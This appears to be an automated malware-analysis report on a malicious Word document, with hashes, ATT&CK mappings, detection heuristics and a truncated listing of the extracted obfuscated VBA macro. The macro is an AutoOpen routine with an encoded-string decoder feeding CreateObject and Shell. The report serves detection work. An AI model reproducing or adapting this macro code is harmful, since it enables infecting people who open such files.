Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4a56bd3af6df1246…

MALICIOUS

Office (OLE)

457.0 KB Created: 2018-12-19 18:06:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: c6460a79e277ebae25bc91fe2e7e3851 SHA-1: c4f7c9361fb45ddce38aba81c54da5969d1c357f SHA-256: 4a56bd3af6df1246286b9eebfd055cc060851e71346709628d3ff72175085693
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes CreateObject and Shell() calls, indicating an intent to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.

Heuristics 8

  • ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 68616 bytes
SHA-256: fc4833fdda3ee8381c645d2dce45ad2fb53a4befb730cf36d96c1f95fc8e3f77
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "sQYppTLCotAOVAwKmGl"
Sub AutoOpen()
Dim HCUgCTrhEczyc As String: HCUgCTrhEczyc = vZcCKRooQWIXQ("Dh4HEVNARQIbAARSRRNuRjVDb1AiV3IcH1dLEQ==")
lkSAYFPjAlGgNC.TWROvqCvkFAHOVAr (wcVrOCpLBDRplrHiCF(HCUgCTrhEczyc, "fjsaiojgiower$@)G$@)G$@(123tu89013tT*$T@()!#T)$T(RGIWKWEPEQF{fg]erpj;lksdf8924otgERGIW#*@#($TR(W@GUWG(@#RIDSJVXDASUIT("))
End Sub
Public Function BGcqSbFvoloBXHiypb(rtpQWcmioKTUTPcl As String) As Object
Dim ZigsemUogdi As Collection
Set ZigsemUogdi = New Collection
ZigsemUogdi.Add "RmwOZOnjESHlvc"
ZigsemUogdi.Add "QDKUHdTxGROAu"
ZigsemUogdi.Add "YCzAMXnKtoyRTdLVtZ"
ZigsemUogdi.Add "QqafkRvpSEhPOzhu"
ZigsemUogdi.Add "MEJmbCkDzRkVx"
ZigsemUogdi.Add "OXEvDisOFFcZpZZfML"
Set BGcqSbFvoloBXHiypb = VBA.CreateObject(rtpQWcmioKTUTPcl)
End Function
Public Function vZcCKRooQWIXQ(NGcYeSWwqWBUNwD As String, Optional BZuLpbNVRTvRFfWqC As Boolean = True) As String
Dim opBjnkOoToAkISbpj: opBjnkOoToAkISbpj = Array("dKiXtkcrdklxGA""ALEDuYGyRqNuHXrLbRa""RksJvkjGOPN""CMayGoumLSPnq""JIcbsOQwSpKtATfKM""lJyKCozjsLzjceD""zgDgfJTSspek")
Static RccTfUsvMmURR(0 To 255) As Byte
Dim DXTtYIiqTgBZHdSyqk As Collection
Set DXTtYIiqTgBZHdSyqk = New Collection
DXTtYIiqTgBZHdSyqk.Add "FaikxNQgSOwpoSU"
DXTtYIiqTgBZHdSyqk.Add "UagowtNOEUwKEpO"
DXTtYIiqTgBZHdSyqk.Add "aAwaDQApOYxijUEFo"
DXTtYIiqTgBZHdSyqk.Add "vpVwtHfGalhhSp"
Dim buPbuROcYYqlTRMZTlB() As Byte, fLmmaqidsaJlpt() As Byte
Dim rAIEZYgbWBzdjKMN As Integer
rAIEZYgbWBzdjKMN = 9 * 1
Dim HeRwylAyEIduC As Long, FXuYECZFqhd As Long
Dim NlXweQQqSCdL, vVHBAmCtGSP As Integer
NlXweQQqSCdL = 1
vVHBAmCtGSP = 85
While NlXweQQqSCdL < vVHBAmCtGSP
vVHBAmCtGSP = vVHBAmCtGSP - NlXweQQqSCdL
Wend
If RccTfUsvMmURR(0) = 0 Then
Dim ZrAODEQFQway, mStdFGRwygEeBiMv As Integer
For mStdFGRwygEeBiMv = 0 To 3
ZrAODEQFQway = ZrAODEQFQway + mStdFGRwygEeBiMv
Next mStdFGRwygEeBiMv
For HeRwylAyEIduC = 0 To 255
Dim FQggOPPsTVKAtXJEF, eobvNqmqpromJvij As Integer
FQggOPPsTVKAtXJEF = 7
eobvNqmqpromJvij = 66
While FQggOPPsTVKAtXJEF < eobvNqmqpromJvij
eobvNqmqpromJvij = eobvNqmqpromJvij - FQggOPPsTVKAtXJEF
Wend
RccTfUsvMmURR(HeRwylAyEIduC) = 255
Dim OazgVwCeYaGNc, BdPhbCCpnagdwgN As Integer
For BdPhbCCpnagdwgN = 0 To 1
OazgVwCeYaGNc = OazgVwCeYaGNc + BdPhbCCpnagdwgN
Next BdPhbCCpnagdwgN
Next HeRwylAyEIduC
Dim uEgAaqicFIEkRtUUf As Integer
uEgAaqicFIEkRtUUf = 4
Dim KxmmnhOHnRijyIebyw As Integer
KxmmnhOHnRijyIebyw = 2 - 7 * 1
If uEgAaqicFIEkRtUUf < Len(Application.UserName) Then
Dim docfnnfbfVTivvvxaSB, QeGsWglCEBPrOtm As Integer
For QeGsWglCEBPrOtm = 0 To 6
docfnnfbfVTivvvxaSB = docfnnfbfVTivvvxaSB + QeGsWglCEBPrOtm
Next QeGsWglCEBPrOtm
Dim bCKZuMsnGSlzAfxMW As Variant
End If
For HeRwylAyEIduC = 0 To 25
Dim ipZPaJOBTXkpFaIW, qSwENNFCmBNHFicRvtb As Integer
ipZPaJOBTXkpFaIW = 5
qSwENNFCmBNHFicRvtb = 38
While ipZPaJOBTXkpFaIW < qSwENNFCmBNHFicRvtb
qSwENNFCmBNHFicRvtb = qSwENNFCmBNHFicRvtb - ipZPaJOBTXkpFaIW
Wend
RccTfUsvMmURR(HeRwylAyEIduC + 65) = HeRwylAyEIduC
Dim GWHavjycgvwwKUoFs, ofokysBifkgminNBAGa As Integer
For ofokysBifkgminNBAGa = 0 To 7
GWHavjycgvwwKUoFs = GWHavjycgvwwKUoFs + ofokysBifkgminNBAGa
Next ofokysBifkgminNBAGa
Next HeRwylAyEIduC
Dim yXiAKOAgsuGslosdFu: yXiAKOAgsuGslosdFu = Array("xQdUkmGApdDMHyxugPJ")
For HeRwylAyEIduC = 26 To 51
Dim InbBscmMxAhyu, OAeXlNNEHKnsUxk As Integer
For OAeXlNNEHKnsUxk = 0 To 2
InbBscmMxAhyu = InbBscmMxAhyu + OAeXlNNEHKnsUxk
Next OAeXlNNEHKnsUxk
RccTfUsvMmURR(HeRwylAyEIduC + 71) = HeRwylAyEIduC
Dim fnLDlNKYeZCv As Integer
fnLDlNKYeZCv = 9
Dim bmVyHktIzDBxfrPfEC: bmVyHktIzDBxfrPfEC = Array("ZBiaBMykZIo""zVMGqpzbAyw""DkHWnbHezLNEsjhZj""VzLCiuuAnZqFXzr""txmrEggyeoKuA""IxHlHmSVWfZQAcQL""OgZupMyAuwxPfxvqFrM")
If fnLDlNKYeZCv < Len(Application.UserName) Then
Dim PLWHCnzTGPrKtwaJL As Collection
Set PLWHCnzTGPrKtwa
... (truncated)